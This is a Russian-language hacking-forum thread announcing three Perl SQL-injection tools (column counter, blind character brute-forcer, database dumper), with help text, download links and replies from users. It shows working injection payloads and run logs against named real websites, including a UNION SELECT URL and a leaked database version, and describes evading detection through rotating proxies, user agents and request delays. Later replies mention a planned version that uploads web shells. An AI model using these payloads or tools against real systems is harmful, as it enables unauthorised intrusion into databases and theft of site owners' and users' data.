Antichat SQL-tools for check columns v.1.1.1
Скрипт для подбора числа столбцов в БД.


Основная функция:
- подбор числа столбцов


Обращаю ваше внимание, что консольная и гуи одной версии практически аналогичны по фунциональности.

v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(15.10.2006) - новое: GUI-интерфейс!
- новое: эвристическое определение необходимых параметров
- фикс: Win\Nix-совместимость
v1.0.9(12.10.2006) - новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
- оптимизация кода и алгоритмов
v1.0.8(10.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
v1.0.7(30.09.2006) - оптимизация кода
v1.0.6(17.07.2006) - фикс: переработан механизм перебора для GROUP и ORDER, что уменьшает число запросов + экономит трафик.
v1.0.5(31.08.2006) - новое: логирование результата
v1.0.4 - мелкая оптимизация, правка багов, автоматизация
v1.0.3 - новое: на выбор три типа перебора - union, group by и order by(Greets ZaCo)
- новое: добавил getopts. Теперь удобно указывать параметры
- новое: возможность указать начальное и конечное число столбцов.
- новое: поддержка прокси
- новое: рабочий POST или GET запрос
v1.0.2 - новое: что подставлять в столбцы - цифры или null'ы
- новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
- новое: защита от дурака + хелп
v1.0.1 - новое: автовыход при найденных столбцах(ориентир - по отсутствию указанной вами ошибке)
v1.0.0(19.06.2006) - Увидел cкрипт Форба(10 строк). Появилось желание доработать.


Скачать: http://sec-123.narod.ru/public/sql_check_public.rar



Выдержка из хелпа:
Options:
-u - путь к сайту с уязвимым скриптом, например http://site.com/index.php?user=-1'))
-a - строка с ошибкой неправильного числа столбцов, по её отсутствию в верном запросе определяется конец перебора
-n - с какого столбца начнём брут?
-N - до какакого столбца будем брутить?
-m - способ подбора: UNION SELECT, GROUP BY, ORDER BY. Быстрее работает group и order, но надёжнее union.
-s - разделитель между операторами. Иногда пробел фильтруецца - юзаем многочисленные его альтернативы.
-z - столбцы при union-методе можно перечислять цифрами(1,2,3..), а можно нулами(null)
-c - комменты в конце выражения. Для mysql характерно "/*" , а для mssql "--"
-g - работа через гет или пост-запросы
-t - время задержки. выдерживается пауза при каждом запросе. RAND - случайная от 0 до 10
-b - юзер-агент. выбирается случайный юзер-агент при каждом запросе
-p - файл с проксями. выбирается случайная прокся при каждом запросе
-l - логирование работы в файл


Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Протестить на сайте:
C:\sql-check.pl -u "http://www.comstar.ru/press-center/news/?month=10&year=2004"


Лог работы:

=========_Script_Brut_Columns_========

*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004
Evristic:______ON
Min_colomns:___1
Max_colomns:___50
Metod:_________UNION
SPACE:_________%20
NULL:__________1
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log.txt

=========_Script_Brut_Columns_========

GO!

Start evristic detection.
Please, WAIT...


Detect MySQL

Start UNION
Please Wait...

Try 1 column... NOT FOUND =(
Try 2 column... NOT FOUND =(
Try 3 column... NOT FOUND =(
Try 4 column... NOT FOUND =(
Try 5 column... NOT FOUND =(
Try 6 column... NOT FOUND =(
Try 7 column... NOT FOUND =(
Try 8 column... NOT FOUND =(
Try 9 column... NOT FOUND =(
Try 10 column... NOT FOUND =(
Try 11 column...
------------------------

OK! Find 11 columns.

Right URL:
http://www.comstar.ru/press-center/news/?month=10&year=2004%20UNION%20SELECT%201,2,3,4,5,6,7,8,9,10, 11/*


=========_Script_Brut_Columns_========

*URL:___________http://www.comstar.ru/press-center/news/?month=10&year=2004
Evristic:______ON
Min_colomns:___1
Max_colomns:___50
Metod:_________GROUP
SPACE:_________%20
NULL:__________1
POST-GET:______GET
Time(sleep):___0
User-Agent:____useragent.txt
PROXY:_________proxy.txt
Log:___________log.txt

=========_Script_Brut_Columns_========

GO!

Start evristic detection.
Please, WAIT...


Detect MySQL

Start GROUP
Please Wait...

Try 25 column... ok!
Try 13 column... ok!
Try 7 column... no...
Try 10 column... no...
Try 10 column... ok!
Try 11 column... ok!
Try 12 column...

------------------------

OK! Find 11 columns.

Right URL:
http://www.comstar.ru/press-center/news/?month=10&year=2004%20GROUP%20BY%2012/*

Antichat SQL-tools for one_simvol_brut_columns v.1.1.1
Скрипт для посимвольного перебора записей в БД.


Основная функция:
- посимвольный подбор целевого значения записи в БД


Обращаю ваше внимание, что консольная и GUI одной версии практически аналогичны по фунциональности.


v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(15.10.2006) - новое: GUI-интерфейс!
- новое: эвристическое определение положительного ответа, длинны целевой записи
- фикс: Win\Nix-совместимость
v1.0.9(12.10.2006) - произведено разделение потока вывода в лог и консоль.
(Это сделано для того, чтобы при посимвольном бруте файла через load_file() информационный мусор не попадал в лог)
- пресеты ascii - на выбор
- новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
- оптимизация кода. улучшение алгоритмов перебора для минимального кол-ва запросов.
v1.0.8(10.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
- новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
v1.0.7(30.09.2006) - фикс: исправил критическую ошибку в модуле определения длинны.
(Обозвал функцию "lenght" вместо "length". Да, бывает. Сорри.)
v1.0.6(17.07.2006) - новое: улучшил алгоритм перебора - экономия трафика
v1.0.5(31.08.2006) - новое: авто-определение длины перебираемой записи
- новое: логирование результата
v1.0.4 - мелкая оптимизация, правка багов, автоматизация
v1.0.3 - новое: добавил getopts. Теперь удобно указывать параметры
- новое: поддержка прокси
- новое: рабочий POST или GET запрос
v1.0.2 - новое: защита от дурака + хелп
- новое: возможность указать начальную и конечную позицию записи
v1.0.1 - новое: автоматический брут всей записи (ранее подбирал только указанный символ)
v1.0.0(19.06.2006) - Раскопал скрипт от rst(r57sql_ocb.pl). Появилось желание доработать.


Скачать: http://sec-123.narod.ru/public/sql_ocb_public.rar


Выдержка из хелпа:
Options:
-u - путь к сайту с уязвимым скриптом
-s - подзапрос к бд. Например, "version()" или "(select user from mysql.user)"
-a - строка, присутствующая в ответе, если условие 1=1 и отсутствует, когда 1=2 ; При указании "AUTO" будет определена самостоятельно
-m - наборы символов ascii: 0-все, 1-мд5, 2-цифры, 3-англ.буквы, 4-рус.буквы
-L - автоопределение длинны строки. Удобно при бруте строк рэндомных длинн.
0-выход при первой ошибке(рекомендую все ascii, тогда выход при конце строки)
1-задаём нужную длинну строки через n и N. Все не найденные ascii обозначаться "*"
2-включаем автоопределение длинны строки. Все не найденные ascii обозначаться "*"
-n - (только для L=1)позиция первого символа в строке, с которого начнём брут
-N - (только для L=1)позиция последнего символа в строке, на котором закончим брут
-S - вид пробела: "%20","+","%2B","/**/","%09","%0D","$IFS"
-c - вид коментов: "/*","--","#"
-g - работа через гет или пост-запросы
-t - время задержки. выдерживается пауза при каждом запросе. RAND - случайная от 0 до 10
-b - юзер-агент. выбирается случайный юзер-агент при каждом запросе
-p - файл с проксями. выбирается случайная прокся при каждом запросе
-l - логирование(лог адаптирован под брут файлов: фразы типа "-> Try 48 .." не пишутся - только сам результат )


Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! В GUI версии используется кодировка "use encoding 'cp1251';". Она была подключена ради поддержки русского gui-хелпа.
При использовании посимвольного брута Вы можете иметь проблемы с неподбираемыми русскими буквами, поскольку ascii-коды в скрипте будут в cp1251, а на сервере в utf-8.
Для устранения глюка просто закоментруйте подключенную кодировку: "# use encoding 'cp1251';"

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Внимание! Выяснена особенность перла, имеющая неприятные последствия.
При глубине вложения процедур более одной, вывод текста в консоль происходит, если выполняется хотя бы одно условие:
- выход из процедуры в тело самой первой процедуры или основной программы;
- использование при выводе символа переноса строки: "\n"
Поскольку структура моих скриптов имеет высокую степень вложений при выполнении, и иногда требуется не выполнять перенос строки, то вывод данных в консоль может быть задержан.
В любом случае в лог-файл данные попадают БЕЗ задержек, поэтому даже если вы кикнули якобы подвисший скрипт - проверьте лог-файл.
Как пример - при посимвольном бруте содержимого файла вывод в консоль будет осуществляться только при переходе на следующую строку в файле, НО в лог-файл будет записан каждый символ.


Протестить на сайте:
C:\sql_ocb.pl -u "http://www.comstar.ru/press-center/news/?month=10&year=2004"


Лог работы:

=====_Sql-Databases One Char Bruteforce Tool_=====

*URL:__________http://www.comstar.ru/press-center/news/?month=10&year=2004
substring():__version()
Answer_true:__AUTO
Ascii:________all
Lenght:_______first-error
Min_num:______1
Max_num:______10
SPACE:________%20
Comment:______/*
POST-GET:_____GET
Time(sleep):__0
User-Agent:___useragent.txt
PROXY:________proxy.txt
Log:__________log_ocb.txt

=====_Sql-Databases One Char Bruteforce Tool_=====

GO!

Auto-Detect Answer. Please, WAIT...

OK! Answer: Dial

Brut string "version()":

4.1.1-alpha-standard-log

-----------------------------------
Result brut(char): 4.1.1-alpha-standard-log
Result brut(ascii): 52,46,49,46,49,45,97,108,112,104,97,45,115,116,97, 110,100,97,114,100,45,108,111,103,


Work finished! EXIT.

Antichat Databases_Dumper_MSSQL(MySQL-5.*) v.1.1.1
Скрипт для дампинга базы mssql, mysql-5.*


Основная функция:
- автоматический частичный\полный дампинг БД (mssql, mysql-5.*)


Скрипт предназначен для автоматического дампа БД, используя sql-инъекцию в запросе на основе системных таблиц "INFORMATION_SCHEMA".
Поддерживаются MSSQL и MySQL.v.5.*.

Когда мы стречаемся с sql-inj в MSSQL приходится искать нужные нам столбцы и таблицы, строить запрос. Хуже, если нужно сдампить всю базу, или просмотреть структуру, а результат каждого запроса - только ОДНА запись. Это самый тяжёлый и нудный случай, и скрипт сущесственно облегчает рутиную работу.

- ВНИМАНИЕ! Включени автодампа и произвольного запроса недопустимо!

- всего предусмотрено три алгоритма автодампа: только скелет таблиц, скелет таблиц и столбцов, полный дамп(данные).

- есть возможность задать произвольный запрос(-Z 1).
(внимание: -Z либо не задан, либо равен 1)
При произвольном запросе производится полный дамп данных. Если столбец не указан - дампится вся указанная таблица.
Условие WHERE при неуказанном столбце выполняет поиск желаемых столбцов. При указанном столбце WHERE производит поиск желаемых данных.

- вы можете при необходимости задать лимит, выбрать желаемый метод отрицания, указать тип шифрования.


Обращаю ваше внимание, что консольная и гуи одной версии практически аналогичны по фунциональности.


v1.1.1(25.11.2006) - новое: по просьбам телезрителей: вывел куки, добавил работу через сокет
- фикс: забыл поставит chomp() при загрузке проксей и user-agent...
- новое: вывел дата+время атаки
v1.1.0(19.10.2006) - новое: GUI-интерфейс!
- фикс: Win\Nix-совместимость
v1.0.9(19.10.2006) - новое: режим посимвольного брута. Специально для хакеров-камикадзе =)Пакуйте сухари, к Вам уже едут!!!
Автоопределение верного ответа, пресеты ascii.
Автоопределение длины записи не стал встраивать - имхо совсем не нужно оно тут. Это лишние запросы.
v1.0.8(18.10.2006) - новое: эвристическое определение необходимых параметров
Очень полезный модуль. Определяет тип БД, кол-во столбцов UNION, рабочий столбец и его атрибуты
v1.0.7(17.10.2006) - новое: прокси - рэндомный выбор из файла
- новое: юзер-агент - рэндомный выбор из файла
- новое: случайное\фиксированное время задержки между запросами
v1.0.6(16.10.2006) - новое: добавил convert(mysql) для столбцов
v1.0.5(15.10.2006) - новое: добавил AES_ENCRYPT шифрование столбцов
v1.0.4(14.10.2006) - мелкая оптимизация, правка багов, автоматизация
v1.0.3(12.10.2006) - фикс: исправил грубую ошибку в работе пост-запросом
v1.0.2(11.10.2006) - новое: альтернативная замена пробелов
- новое: альтернативная замена коментов
v1.0.1(10.10.2006) - новое: защита от дурака + хелп
v1.0.0(24.08.2006) - надоело. НАДОЕЛО! это пиздец какой-то дампить бд вручную
- новое: дамп БД: только структура таблиц, структура таблиц и столбцов
- новое: полный дамп БД в указанным вами запросе
- новое: поддержка mysql,mssql и характерного для них синтаксиса
- новое: два вида отрицания: "NOT IN" и "<>"
- новое: шифрование переменных в hex и char
- новое: работа пост или гет запросом
- новое: поддержка прокси
- новое: логирование в файл


Скачать: http://sec-123.narod.ru/public/sql_dump_public.rar


Выдержка из хелпа:
Options: *-необходимый параметр
*-u - путь к сайту с уязвимым скриптом "http://site.com/?bag=-1'"
-W - юзаем юнион(-W=0) или подзапрос(-W=1)
-A - алгоритм без доп.условия where:
"1" - сдампить только названия таблиц без столбцов и данных
"2" - сдампить только названия таблиц и столбцов без данных
"3" - полный дамп базы.
-Z - выдрать данные из конкретной таблицы,столбца. Дампит полностью, игнорируя -A
-t - выдрать только из указанной таблицы
-с - выдрать только из указанного столбца таблицы
-w - доп.условие where
-E - эвристическое определение всех ниже лежащих подпараметров.
-M - 0="MSSQL"(default); 1="MySQL"
-C - вид комента. 0="/*",1="--",2="#"
-O - all column in SELECT (default=1)
-o - work column in SELECT (default=1)
-s - строка\символы до полезного параметра
-S - строка\символы после полезного параметра
-m - TOP(mssql) или LIMIT(mysql-5.*)
-n - параметр TOP или первый параметр LIMIT
-N - второй параметр LIMIT. при отсутствии равен n
-z - конвертирование cp1251 или latin1
-a - шифрование имён столбцов в AES_ENCRYPT(AES_DECRYPT(TABLE_NAME,0x71,0x71))
-B - режим посимвольного брута.( Элект, ТЫ ПСИХ!! )
-s - строка в правильном запросе(AND 1=1)
-i - пресеты ascii-перебора. По дефолту - все символы
-L - по умолчанию выход при первой ошибке, что при юзании всех ascii означает конец строки
-v - с какой позиции начать перебор неизвестной(по дефолту с первой)
-V - на какой позиции закончить(по дефолту на 10-й)
-f - задаёт отрицание: 'NOT IN' либо '<>'
-h - шифрование переменных в HEX, CHAR
-r - вид пробела. SPACE(%20)=0(def);'+'=1;%2B=2;/**/=3;TAB(%09)=4;%0D=5;\$IFS=6
-g - работа через гет или пост-запросы
-T - время задержки. 'RAND'-рэндомное от 1 до 10 сек
-b - файл со списком юзер-агентов. рэндомный выбор
-p - файл с проксями. рэндомный выбор
-l - логирование в указанный файл


Алармы.

Внимание! Файл лога сохраняется в папку, из которой был запущен родитель процеса перл(для виндв - cmd.exe).
Рекомендую создать в папке со скриптом bat-файл с содержимым "cmd.exe".

Внимание! В GUI версии используется кодировка "use encoding 'cp1251';". Она была подключена ради поддержки русского gui-хелпа.
При использовании посимвольного брута Вы можете иметь проблемы с неподбираемыми русскими буквами, поскольку ascii-коды в скрипте будут в cp1251, а на сервере в utf-8.
Для устранения глюка просто закоментруйте подключенную кодировку: "# use encoding 'cp1251';"

Внимание! GUI(TK) под никсами выглядит не очень красиво =)

Внимание! Выяснена особенность перла, имеющая неприятные последствия.
При глубине вложения процедур более одной, вывод текста в консоль происходит, если выполняется хотя бы одно условие:
- выход из процедуры в тело самой первой процедуры или основной программы;
- использование при выводе символа переноса строки: "\n"
Поскольку структура моих скриптов имеет высокую степень вложений при выполнении, и иногда требуется не выполнять перенос строки, то вывод данных в консоль может быть задержан.
В любом случае в лог-файл данные попадают БЕЗ задержек, поэтому даже если вы кикнули якобы подвисший скрипт - проверьте лог-файл.
Как пример - вывод данных из столбца осуществляется в строку без "\n" и пока не будут найдены все данные в столбце - они не отобразяться в консоли, но прологируться.



Протестить на сайте:
C:\>C:\mssql_base_dump.pl -u "http://www.onlineticketshop.nl/content/details.asp?sub_id=556&taal_id=(" -W 1


Лог работы:
Они слишком большие. Прилагаются в аттаче.
http://sec-123.narod.ru/public/basedump_onlyt.txt
http://sec-123.narod.ru/public/basedump_query.txt
http://sec-123.narod.ru/public/basedump_ocb.txt

Сразу скажу, что заявления вроде "почему не ассемблер?.." идут в топку.
Я не борюсь за звание мега-программера и если Вы можете написать это лучше - я за Вас рад.

Тулзы написаны для людей, которым некогда терять своё время и силы на рядовые операции.
============


Серия тулз Antichat SQL-tools v.1.1.1:
- чекер столбцов
- посимвольный брутер
- дампер баз.

GUI - путь к пониманию.
Ну, сейчас это во-первых модно, во вторых очень удобно.
Недолго и запутаться в настройках консольной версии.
ГУИ позволил во многом облегчить понимание процесса: встроенные автоподстройки табов не дадут Вам поставить недопустимые взаимоисключающие параметры.

Эвристический анализатор - "Тефай думает за Вас!"
Что называется - эксплоит для домохозяек.
Создание эвристика позволило ограничиться передачей скрипту ОДНОГО ТОЛЬКО УРЛА!
Я долго возился с ним и могу гарантировать стабильную работу в %50 случаев, каковыми собственно являються стандартные инъекции.
Вообще удивительно, но до сих пор никто не озадачился написать нечто подобное. Может просто лень?
По крайне мере мне не встречался ни один продукт тем разнообразием функций, что мне удалось написать.
Так что думаю не ошибусь, если заявлю об уникальности и лидерстве данных утилит.

Самым сложным(ну и разумеется самым полезным) является Дампер базы. В нём собраны все технологии из двух предыдущих скриптов + только в нём есть полноценный эвристик и ещё некоторые интересные алгоритмы.

=================================

Принимаються конструктивные предложения по идеям\фиксам.

Спасибо за внимание.

У меня тут 2 вопроса:
1) На чём эта тулза написана;
2) Будут ли её исходники;

perl исходники перед тобой

Думпером пользовался для МсСкул, очень классная вешь.

К новому году будет версия SQL inj Tool 2.0 с тем же набором + заливка шелов и сам знаешь с чем :).Реализовано win-exe
Elekt молодца! держи +5

Очень хотелось бы брутеры названий столбцов и колонок по словарю.

Такой скрипт есть. Но только для МОА.

и сам знаешь с чем
Интересно это "чем" как-то связано с р57 и их шелом? ;)))

Тестил н 2 сайтах результат 0.
Возможности супер интерфейс ужасный нечего не понятно.

1-ый скрипт точно работает.
а чего ты хотел от дизайна? ИМХО на перле писать гуи программы ваше изврашение...))
вроде все понятно...

А как эти скрипты в гуи запустить?

to gazta качай ActivePerl и запускай с командной строки

Дак ето и есть гуи интерфейс?

gazta, поясни значение твоего "ето"? Может ты не gui-версию запускаешь..

Не всё то через актив перл просто у меня понятия гуи другие ведать :)

to gazta вот ексклюзивно для тебя пару скринов сделал как оно работает и выглядит зацени :
http://kaspercrack.narod.ru/1.bmp
http://kaspercrack.narod.ru/2.bmp

Кто нить видео положите как юзать нефига не впираю...
ps ошибки испраил...

Блин выложите плиз норм ссыль а то у меня некачает.

http://kaspercrack.narod.ru/sql_dump_public.rar
http://kaspercrack.narod.ru/sql_ocb_public.rar

Elekt
Скачал, заюзать не успел пока. Но описалово порадовало. Столько фишек в 3х скриптах.. ммм. только с инглишом немного плохо, в usage оч много грам ошибок ).
А вопрос собсно в чем..

Большая ли разница между прив и пабл версиями скриптов? И коммерческая ли прив-версия?

2 FurA
-Очень хотелось бы брутеры названий столбцов и колонок по словарю.
-Такой скрипт есть. Но только для МОА.
+)

2 FurA
-Такой скрипт есть. Но только для МОА.
+)

2 +toxa+
Я подниму тему, о том, что ты сливаешь содержимое закрытого раздела. )))))))

Извиняюсь за оффтоп, не сдержался в свете текущих событий.

Elekt
Большая ли разница между прив и пабл версиями скриптов? И коммерческая ли прив-версия?

Разница между публичной и приватной версией в том, что публичная более не будет обновляться или обновится не скоро.
+ есть брутер имен колонок и таблиц, но поскольку базу собирали общими силами мемберов - тулза только для них же.
Ограничений по функциональности никаких. Юзайте на здоровье =)

Еще раз говорю всем - "защита от дурака"- имеется ввиду не специально допущенные ошибки как в эксплойтах, а максимально понятный пользователю интерефейс и помощь.

Комерческий подход я не стал делать.
Я за бесплатное\крякнутое ПО с открытым исходным кодом :)
Ставка сделана не на деньги, а на нехватку полноценных возможностей подобных sql-утилит.
Это вам не криптор, который после первых трех покупателей попадает в вирусные базы.
Для меня важнее не мизерная денежная компенсация, а востребованность и использование\применение тулз в народе.
Утилиты будут жить, а не пылится и гнить в привате.

в usage оч много грам ошибок ).Да, извините, не на переводчика учусь :)
Я бы на русском написал (и на писал в гуи хелпе), но там несовместимость с кодировкой, сами понимаете, будет оч часто проявляться.

я бы только заюзал фичу с подборои.. а она тока в привате? эх.... а так софтина ничего, правда руками удобнее)

кстати про дурака, когда-то юзал относительно недавно, то в одной из софтин не хотела запускаться с картинкой, пришлось снести этот код(че картинку пихает), тогда только работала...

Работоспособность скрипта не обсуждается) Но вот сам код... Как бы это сказать... Elekt, поищи темы с Perl Underground. Если переделаешь с нормальным стилем - самому приятней будет)

хелп, как в гуи версии скрипта mssql_base_dump избавиться от ненужного запроса where! Я знаю и имя таблицы и имена нужных мне колонок, необходимо просто сдампить их содержимое. Вроде как все прописал, нов тостовом запросе фигурирует ещё и where, который мне не нужен.

Работоспособность скрипта не обсуждается) Но вот сам код... Как бы это сказать... Elekt, поищи темы с Perl Underground. Если переделаешь с нормальным стилем - самому приятней будет)

нунах. работает. а память здесь не так важна, чтоб заморачиваться из-за неё со стриктом и определением переменных. не для меня этот секос , я говорил в самом начале

Вроде как все прописал, нов тостовом запросе фигурирует ещё и where, который мне не нужен.

помоему я указывал в случае отсутствия where дампить без него.

ну в любом случае можно вставить 'AND 1=1' и все будет аналогично дампиццо

Обновлена GUI-версия: "Скрипт для посимвольного брута данных"

"More 1 row" и бенчмарк теперь доступен каждому. Аналогов нет.

v1.1.3(30.12.2007)
- новое: авто-поддержка 'Subquery returns more than 1 row'
- новое: авто-поддержка BENCHMARK
- новое: поддержка SSL(отключена по дефолту, раскоментируйте при необходимости)
- новое: char(),hex() encode
v1.1.2(16.08.2007)
- новое: добавление произвольного http-хидера, например Cookie
- новое: SQL-inj через через произвольный http-хидер, например CLIENT-IP
- новое: работа по ответу в ложном условии 1=0
- новое: работа через условия OR или AND на выбор
- фикс: переход на HTTP::REQUEST

Чтобы получить поддержку SSL, воспользуйтесь приложенными инструкциями по установке SSL-либ.

Планируется съем видео по юзанию тулз...

==================
всех с наступившим 2008

http://sec-123.narod.ru/public/sql_ocb_public_1.1.3.zip

D:\>perl\bin\perl.exe D:\pl\sql\sql.pl
Cannot open 'logo.gif' in mode 'r' at D:/Perl/site/lib/Tk/Image.pm line 21.
в чем то проблемма у меня =\

да, у некоторых бывает. закоментируй

#################################################
# выводим рисунок
$wind->Label( -text => ' ', -font => '{Verdana} 1 bold',)->pack();
$wind->Photo('logo', -file => 'logo.gif');
$frames_image = $wind->Frame()->pack(-side => "top" , -anchor => 'center');
$frames_image->Label(-height=>70, -image=>'logo', -width=>750,)->pack(-side => "top" , -anchor => 'center');

народ снимите плизз видео как юзать это чудо из чудес поюзать очень хочу а ниполучаеться (((

и вообще работает она без прокси? как отключить прокси?

делаю вроде все правильно а выдает вот что


H:\Scripts\sql_dump_public>mssql_base_dump_111.pl -u "http://cfis.by/text.php?id
=999999" -W 1


=====_Databases_Dumper_MSSQL(MySQL-5.*)_=====

Wed Feb 27 10:43:38 2008

*URL:____________http://cfis.by/text.php?id=999999
UNION-Subquery:_Subquery
Algoritm:_______only Tables
Evristic:_______ON
Brut:___________OFF
NOT:____________NOT IN
HEX:____________OFF
Space:__________%20
POST-GET:_______GET
Time:___________0
User-Agent:_____useragent.txt
Proxy:__________proxy.txt
Log:____________log_basedump.txt


=====_Databases_Dumper_MSSQL(MySQL-5.*)_=====

GO!

Start evristic detection. Please, WAIT...

Detect MySQL

OK! Find 1 column.

Use mysql concat-tehnology:

First Answer: blahhh
Second Answer: hhhalb


Sorry, Work Column not detect =( EXIT


помоему неправильно определяет
OK! Find 1 column. там должно быть 4

Как насчет добавления работы с Oracle ?

народ снимите плизз видео как юзать это чудо из чудес поюзать очень хочу а ниполучаеться (((


поддерживаю..

PS все понялл как))

Alexsise помог)) https://forum.antichat.ru/showpost.php?p=416792&postcount=9

архиология конечно, но всёже - перезалейте 3 скрипта с 1 странички.